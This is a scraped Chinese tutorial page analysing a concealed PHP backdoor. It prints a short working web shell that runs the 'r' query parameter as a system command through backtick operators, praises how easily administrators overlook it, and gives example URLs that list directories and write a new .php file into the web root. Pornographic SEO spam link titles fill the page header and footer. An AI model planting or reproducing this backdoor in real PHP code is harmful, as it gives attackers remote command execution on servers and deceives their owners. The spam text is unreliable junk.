激情久久久_欧美视频区_成人av免费_不卡视频一二三区_欧美精品在欧美一区二区少妇_欧美一区二区三区的

服務器之家:專注于服務器技術及軟件下載分享
分類導航

PHP教程|ASP.NET教程|Java教程|ASP教程|編程技術|正則表達式|C/C++|IOS|C#|Swift|Android|VB|R語言|JavaScript|易語言|vb.net|

服務器之家 - 編程語言 - PHP教程 - 一個不易被發現的PHP后門代碼解析

一個不易被發現的PHP后門代碼解析

2020-07-16 14:48PHP中文網 PHP教程

這篇文章主要介紹了一個不易被發現的PHP后門代碼解析,對于網絡安全來說非常重要,需要的朋友可以參考下

偶然間看到一段,看起來似乎沒有什么問題,確是能致命的后門代碼,這里用到了一個一般的PHPer都不怎么關注的反撇號 ` ,反撇號包含的字符串,等同于shell_exec函數。

偽裝性很好,很容易被管理員忽略。

?
1
2
3
4
$selfNums = $_GET['r'];
if (isset($selfNums)){
  echo `$selfNums`;
}

剛看到這段代碼我想大家都會說沒有問題,但是細心的朋友也會發現下面的變量被一個符號包起來了,既然是變量為什么要這樣了,

而且又不是單引號,這個就是關鍵所在了,這個符號是 Esc 下面的一個鍵(位于感嘆號!旁邊的),

通過 echo `系統命令`; 可以達到 system(); 一樣的效果

如果不信的朋友可以測試

http://127.0.0.1/t.php?r=dir 可以列出目錄

http://127.0.0.1/t.php?r=echo 我是馬兒 >>D:\web\90sec.php

我用 appserv 和虛擬主機已經測試成功。

延伸 · 閱讀

精彩推薦
主站蜘蛛池模板: 91成人免费网站 | 91美女视频在线 | 黄色毛片免费看 | 久久精品免费国产 | 中国videos露脸hd | 欧美淫视频 | 永久免费毛片 | 91性高湖久久久久久久久网站 | 中文字幕在线播放不卡 | 一级毛片视频播放 | 狼伊千合综网中文 | 草久影视 | 免费黄色在线观看网站 | 激情97 | 欧美精品久久久久久久久久 | 国产免费观看av | sm高h视频| 欧美黄色性视频 | 国产精品自拍av | 最新欧美精品一区二区三区 | 久久久久久片 | 999精品久久久 | 国产免费一区二区三区最新不卡 | 国产高清自拍一区 | 一级毛片免费观看在线 | 久久影院yy6080 | 双性帝王调教跪撅打屁股 | 黄色网址免费在线播放 | 久久亚洲线观看视频 | 一级毛片免费在线 | 欧美四级在线观看 | 久在线播放| 青青草好吊色 | 国产精品久久久久久久久久东京 | 美国av片在线观看 | 亚洲第一成人久久网站 | 九九热国产视频 | 在线观看免费视频麻豆 | 日本在线播放一区二区 | 国产一区视频在线观看免费 | 91午夜少妇三级全黄 |